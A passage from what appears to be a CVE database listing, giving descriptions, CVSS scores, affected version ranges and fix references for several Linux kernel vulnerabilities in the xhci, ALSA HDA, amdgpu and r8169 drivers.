(\"xhci: Fix failure to give back some\ncached cancelled URBs.\"), it was acknowledged again.\n\n[Mathias: commit 94f339147fc3 (\"xhci: Fix failure to give back some cached\ncancelled URBs.\") was a targeted regression fix to the previously mentioned\npatch. Users reported issues with usb stuck after unmounting/disconnecting\nUAS devices. This rolled back the TD clearing of multiple streams to its\noriginal state.]\n\nApparently the commit author was aware of the problem (yet still chose\nto submit it): It was still mentioned as a FIXME, an xhci_dbg() was\nadded to log the problem condition, and the remaining issue was mentioned\nin the commit description. The choice of making the log type xhci_dbg()\nfor what is, at this point, a completely unhandled and known broken\ncondition is puzzling and unfortunate, as it guarantees that no actual\nusers would see the log in production, thereby making it nigh\nundebuggable (indeed, even if you turn on DEBUG, the message doesn\u0027t\nreally hint at there being a problem at all).\n\nIt took me *months* of random xHC crashes to finally find a reliable\nrepro and be able to do a deep dive debug session, which could all have\nbeen avoided had this unhandled, broken condition been actually reported\nwith a warning, as it should have been as a bug intentionally left in\nunfixed (never mind that it shouldn\u0027t have been left in at all).\n\n\u003e Another fix to solve clearing the caches of all stream rings with\n\u003e cancelled TDs is needed, but not as urgent.\n\n3 years after that statement and 14 years after the original bug was\nintroduced, I think it\u0027s finally time to fix it. And maybe next time\nlet\u0027s not leave bugs unfixed (that are actually worse than the original\nbug), and let\u0027s actually get people to review kernel commits please.\n\nFixes xHC crashes and IOMMU faults with UAS devices when handling\nerrors/faults. Easiest repro is to use `hdparm` to mark an early sector\n(e.g. 1024) on a disk as bad, then `cat /dev/sdX \u003e /dev/null` in a loop.\nAt least in the case of JMicron controllers, the read errors end up\nhaving to cancel two TDs (for two queued requests to different streams)\nand the one that didn\u0027t get cleared properly ends up faulting the xHC\nentirely when it tries to access DMA pages that have since been unmapped,\nreferred to by the stale TDs. This normally happens quickly (after two\nor three loops). After this fix, I left the `cat` in a loop running\novernight and experienced no xHC failures, with all read errors\nrecovered properly. Repro\u0027d and tested on an Apple M1 Mac Mini\n(dwc3 host).\n\nOn systems without an IOMMU, this bug would instead silently corrupt\nfreed memory, making this a\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:18:01.329Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/26460c1afa311524f588e288a4941432f0de6228"
        },
        {
          "url": "https://git.kernel.org/stable/c/633f72cb6124ecda97b641fbc119340bd88d51a9"
        },
        {
          "url": "https://git.kernel.org/stable/c/949be4ec5835e0ccb3e2a8ab0e46179cb5512518"
        },
        {
          "url": "https://git.kernel.org/stable/c/61593dc413c3655e4328a351555235bc3089486a"
        },
        {
          "url": "https://git.kernel.org/stable/c/5ceac4402f5d975e5a01c806438eb4e554771577"
        }
      ],
      "title": "xhci: Handle TD clearing for multiple streams case",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40927",
    "datePublished": "2024-07-12T12:25:07.101Z",
    "dateReserved": "2024-07-12T12:17:45.583Z",
    "dateUpdated": "2025-11-03T21:57:55.158Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38388 (GCVE-0-2024-38388)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-05-04 09:13

Title

ALSA: hda/cs_dsp_ctl: Use private_free for control cleanup

Summary

In the Linux kernel, the following vulnerability has been resolved: ALSA: hda/cs_dsp_ctl: Use private_free for control cleanup Use the control private_free callback to free the associated data block. This ensures that the memory won't leak, whatever way the control gets destroyed. The original implementation didn't actually remove the ALSA controls in hda_cs_dsp_control_remove(). It only freed the internal tracking structure. This meant it was possible to remove/unload the amp driver while leaving its ALSA controls still present in the soundcard. Obviously attempting to access them could cause segfaults or at least dereferencing stale pointers.

Severity ?

3.3 (Low)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/191dc1b2ff0fb35e7…
	https://git.kernel.org/stable/c/6e359be4975006ff7…
	https://git.kernel.org/stable/c/3291486af56365409…
	https://git.kernel.org/stable/c/172811e3a557d8681…

Impacted products

Vendor

Product

Version

Linux

Affected: 3233b978af23f11b4ad4f7f11a9a64bd05702b1f , < 191dc1b2ff0fb35e7aff15a53224837637df8bff (git)
Affected: 3233b978af23f11b4ad4f7f11a9a64bd05702b1f , < 6e359be4975006ff72818e79dad8fe48293f2eb2 (git)
Affected: 3233b978af23f11b4ad4f7f11a9a64bd05702b1f , < 3291486af5636540980ea55bae985f3eaa5b0740 (git)
Affected: 3233b978af23f11b4ad4f7f11a9a64bd05702b1f , < 172811e3a557d8681a5e2d0f871dc04a2d17eb13 (git)

Linux

Affected: 6.0
Unaffected: 0 , < 6.0 (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "LOW",
              "baseScore": 3.3,
              "baseSeverity": "LOW",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-38388",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-24T15:21:00.338175Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-06T16:48:24.756Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:04:25.255Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/191dc1b2ff0fb35e7aff15a53224837637df8bff"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6e359be4975006ff72818e79dad8fe48293f2eb2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3291486af5636540980ea55bae985f3eaa5b0740"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/172811e3a557d8681a5e2d0f871dc04a2d17eb13"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "sound/pci/hda/hda_cs_dsp_ctl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "191dc1b2ff0fb35e7aff15a53224837637df8bff",
              "status": "affected",
              "version": "3233b978af23f11b4ad4f7f11a9a64bd05702b1f",
              "versionType": "git"
            },
            {
              "lessThan": "6e359be4975006ff72818e79dad8fe48293f2eb2",
              "status": "affected",
              "version": "3233b978af23f11b4ad4f7f11a9a64bd05702b1f",
              "versionType": "git"
            },
            {
              "lessThan": "3291486af5636540980ea55bae985f3eaa5b0740",
              "status": "affected",
              "version": "3233b978af23f11b4ad4f7f11a9a64bd05702b1f",
              "versionType": "git"
            },
            {
              "lessThan": "172811e3a557d8681a5e2d0f871dc04a2d17eb13",
              "status": "affected",
              "version": "3233b978af23f11b4ad4f7f11a9a64bd05702b1f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "sound/pci/hda/hda_cs_dsp_ctl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.0"
            },
            {
              "lessThan": "6.0",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda/cs_dsp_ctl: Use private_free for control cleanup\n\nUse the control private_free callback to free the associated data\nblock. This ensures that the memory won\u0027t leak, whatever way the\ncontrol gets destroyed.\n\nThe original implementation didn\u0027t actually remove the ALSA\ncontrols in hda_cs_dsp_control_remove(). It only freed the internal\ntracking structure. This meant it was possible to remove/unload the\namp driver while leaving its ALSA controls still present in the\nsoundcard. Obviously attempting to access them could cause segfaults\nor at least dereferencing stale pointers."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:13:30.195Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/191dc1b2ff0fb35e7aff15a53224837637df8bff"
        },
        {
          "url": "https://git.kernel.org/stable/c/6e359be4975006ff72818e79dad8fe48293f2eb2"
        },
        {
          "url": "https://git.kernel.org/stable/c/3291486af5636540980ea55bae985f3eaa5b0740"
        },
        {
          "url": "https://git.kernel.org/stable/c/172811e3a557d8681a5e2d0f871dc04a2d17eb13"
        }
      ],
      "title": "ALSA: hda/cs_dsp_ctl: Use private_free for control cleanup",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38388",
    "datePublished": "2024-06-21T10:18:12.995Z",
    "dateReserved": "2024-06-21T10:12:11.500Z",
    "dateUpdated": "2025-05-04T09:13:30.195Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-39471 (GCVE-0-2024-39471)

Vulnerability from cvelistv5 – Published: 2024-06-25 14:28 – Updated: 2025-05-21 09:12

Title

drm/amdgpu: add error handle to avoid out-of-bounds

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: add error handle to avoid out-of-bounds if the sdma_v4_0_irq_id_to_seq return -EINVAL, the process should be stop to avoid out-of-bounds read, so directly return -EINVAL.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5594971e02764aa1c…
	https://git.kernel.org/stable/c/8112fa72b7f139052…
	https://git.kernel.org/stable/c/ea906e9ac61e3152b…
	https://git.kernel.org/stable/c/011552f29f20842c9…
	https://git.kernel.org/stable/c/5b0a3dc3e87821acb…
	https://git.kernel.org/stable/c/0964c84b93db7fbf7…
	https://git.kernel.org/stable/c/8b2faf1a4f3b6c748…

Impacted products

Vendor

Product

Version

Linux

Affected: 7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9 , < 5594971e02764aa1c8210ffb838cb4e7897716e8 (git)
Affected: 7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9 , < 8112fa72b7f139052843ff484130d6f97e9f052f (git)
Affected: 7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9 , < ea906e9ac61e3152bef63597f2d9f4a812fc346a (git)
Affected: 7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9 , < 011552f29f20842c9a7a21bffe1f6a2d6457ba46 (git)
Affected: 7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9 , < 5b0a3dc3e87821acb80e841b464d335aff242691 (git)
Affected: 7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9 , < 0964c84b93db7fbf74f357c1e20957850e092db3 (git)
Affected: 7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9 , < 8b2faf1a4f3b6c748c0da36cda865a226534d520 (git)

Linux

Affected: 5.4
Unaffected: 0 , < 5.4 (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.94 , ≤ 6.1.* (semver)
Unaffected: 6.6.34 , ≤ 6.6.* (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.268Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5594971e02764aa1c8210ffb838cb4e7897716e8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8112fa72b7f139052843ff484130d6f97e9f052f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ea906e9ac61e3152bef63597f2d9f4a812fc346a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/011552f29f20842c9a7a21bffe1f6a2d6457ba46"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5b0a3dc3e87821acb80e841b464d335aff242691"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0964c84b93db7fbf74f357c1e20957850e092db3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8b2faf1a4f3b6c748c0da36cda865a226534d520"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39471",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:07:48.948392Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:41.543Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5594971e02764aa1c8210ffb838cb4e7897716e8",
              "status": "affected",
              "version": "7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9",
              "versionType": "git"
            },
            {
              "lessThan": "8112fa72b7f139052843ff484130d6f97e9f052f",
              "status": "affected",
              "version": "7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9",
              "versionType": "git"
            },
            {
              "lessThan": "ea906e9ac61e3152bef63597f2d9f4a812fc346a",
              "status": "affected",
              "version": "7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9",
              "versionType": "git"
            },
            {
              "lessThan": "011552f29f20842c9a7a21bffe1f6a2d6457ba46",
              "status": "affected",
              "version": "7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9",
              "versionType": "git"
            },
            {
              "lessThan": "5b0a3dc3e87821acb80e841b464d335aff242691",
              "status": "affected",
              "version": "7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9",
              "versionType": "git"
            },
            {
              "lessThan": "0964c84b93db7fbf74f357c1e20957850e092db3",
              "status": "affected",
              "version": "7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9",
              "versionType": "git"
            },
            {
              "lessThan": "8b2faf1a4f3b6c748c0da36cda865a226534d520",
              "status": "affected",
              "version": "7d0e6329dfdcfe48311f8888d6a8dfa73bee00a9",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.4"
            },
            {
              "lessThan": "5.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.94",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.34",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.94",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.34",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: add error handle to avoid out-of-bounds\n\nif the sdma_v4_0_irq_id_to_seq return -EINVAL, the process should\nbe stop to avoid out-of-bounds read, so directly return -EINVAL."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:12:46.024Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5594971e02764aa1c8210ffb838cb4e7897716e8"
        },
        {
          "url": "https://git.kernel.org/stable/c/8112fa72b7f139052843ff484130d6f97e9f052f"
        },
        {
          "url": "https://git.kernel.org/stable/c/ea906e9ac61e3152bef63597f2d9f4a812fc346a"
        },
        {
          "url": "https://git.kernel.org/stable/c/011552f29f20842c9a7a21bffe1f6a2d6457ba46"
        },
        {
          "url": "https://git.kernel.org/stable/c/5b0a3dc3e87821acb80e841b464d335aff242691"
        },
        {
          "url": "https://git.kernel.org/stable/c/0964c84b93db7fbf74f357c1e20957850e092db3"
        },
        {
          "url": "https://git.kernel.org/stable/c/8b2faf1a4f3b6c748c0da36cda865a226534d520"
        }
      ],
      "title": "drm/amdgpu: add error handle to avoid out-of-bounds",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39471",
    "datePublished": "2024-06-25T14:28:56.906Z",
    "dateReserved": "2024-06-25T14:23:23.745Z",
    "dateUpdated": "2025-05-21T09:12:46.024Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38586 (GCVE-0-2024-38586)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:37 – Updated: 2025-05-04 09:14

Title

r8169: Fix possible ring buffer corruption on fragmented Tx packets.

Summary

In the Linux kernel, the following vulnerability has been resolved: r8169: Fix possible ring buffer corruption on fragmented Tx packets. An issue was found on the RTL8125b when transmitting small fragmented packets, whereby invalid entries were inserted into the transmit ring buffer, subsequently leading to calls to dma_unmap_single() with a null address. This was caused by rtl8169_start_xmit() not noticing changes to nr_frags which may occur when small packets are padded (to work around hardware quirks) in rtl8169_tso_csum_v2(). To fix this, postpone inspecting nr_frags until after any padding has been applied.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/61c1c98e2607120ce…
	https://git.kernel.org/stable/c/b6d21cf40de103d63…
	https://git.kernel.org/stable/c/0c48185a953095567…
	https://git.kernel.org/stable/c/68222d7b4b72aa321…
	https://git.kernel.org/stable/c/078d5b7500d70af2d…
	https://git.kernel.org/stable/c/54e7a0d111240c92c…
	https://git.kernel.org/stable/c/c71e3a5cffd5309d7…

Impacted products

Vendor

Product

Version

Linux

Affected: 9020845fb5d6bb4876a38fdf1259600e7d9a63d4 , < 61c1c98e2607120ce9c3fa1bf75e6da909712b27 (git)
Affected: 9020845fb5d6bb4876a38fdf1259600e7d9a63d4 , < b6d21cf40de103d63ae78551098a7c06af8c98dd (git)
Affected: 9020845fb5d6bb4876a38fdf1259600e7d9a63d4 , < 0c48185a95309556725f818b82120bb74e9c627d (git)
Affected: 9020845fb5d6bb4876a38fdf1259600e7d9a63d4 , < 68222d7b4b72aa321135cd453dac37f00ec41fd1 (git)
Affected: 9020845fb5d6bb4876a38fdf1259600e7d9a63d4 , < 078d5b7500d70af2de6b38e226b03f0b932026a6 (git)
Affected: 9020845fb5d6bb4876a38fdf1259600e7d9a63d4 , < 54e7a0d111240c92c0f02ceba6eb8f26bf6d6479 (git)
Affected: 9020845fb5d6bb4876a38fdf1259600e7d9a63d4 , < c71e3a5cffd5309d7f84444df03d5b72600cc417 (git)

Linux

Affected: 5.7
Unaffected: 0 , < 5.7 (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:25.972Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/61c1c98e2607120ce9c3fa1bf75e6da909712b27"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b6d21cf40de103d63ae78551098a7c06af8c98dd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0c48185a95309556725f818b82120bb74e9c627d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/68222d7b4b72aa321135cd453dac37f00ec41fd1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/078d5b7500d70af2de6b38e226b03f0b932026a6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/54e7a0d111240c92c0f02ceba6eb8f26bf6d6479"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c71e3a5cffd5309d7f84444df03d5b72600cc417"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38586",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:13:50.332760Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:55.087Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/realtek/r8169_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "61c1c98e2607120ce9c3fa1bf75e6da909712b27",
              "status": "affected",
              "version": "9020845fb5d6bb4876a38fdf1259600e7d9a63d4",
              "versionType": "git"
            },
            {
              "lessThan": "b6d21cf40de103d63ae78551098a7c06af8c98dd",
              "status": "affected",
              "version": "9020845fb5d6bb4876a38fdf1259600e7d9a63d4",
              "versionType": "git"
            },
            {
              "lessThan": "0c48185a95309556725f818b82120bb74e9c627d",
              "status": "affected",
              "version": "9020845fb5d6bb4876a38fdf1259600e7d9a63d4",
              "versionType": "git"
            },
            {
              "lessThan": "68222d7b4b72aa321135cd453dac37f00ec41fd1",
              "status": "affected",
              "version": "9020845fb5d6bb4876a38fdf1259600e7d9a63d4",
              "versionType": "git"
            },
            {
              "lessThan": "078d5b7500d70af2de6b38e226b03f0b932026a6",
              "status": "affected",
              "version": "9020845fb5d6bb4876a38fdf1259600e7d9a63d4",
              "versionType": "git"
            },
            {
              "lessThan": "54e7a0d111240c92c0f02ceba6eb8f26bf6d6479",
              "status": "affected",
              "version": "9020845fb5d6bb4876a38fdf1259600e7d9a63d4",
              "versionType": "git"
            },
            {
              "lessThan": "c71e3a5cffd5309d7f84444df03d5b72600cc417",
              "status": "affected",
              "version": "9020845fb5d6bb4876a38fdf1259600e7d9a63d4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/realtek/r8169_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.7"
            },
            {
              "lessThan": "5.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
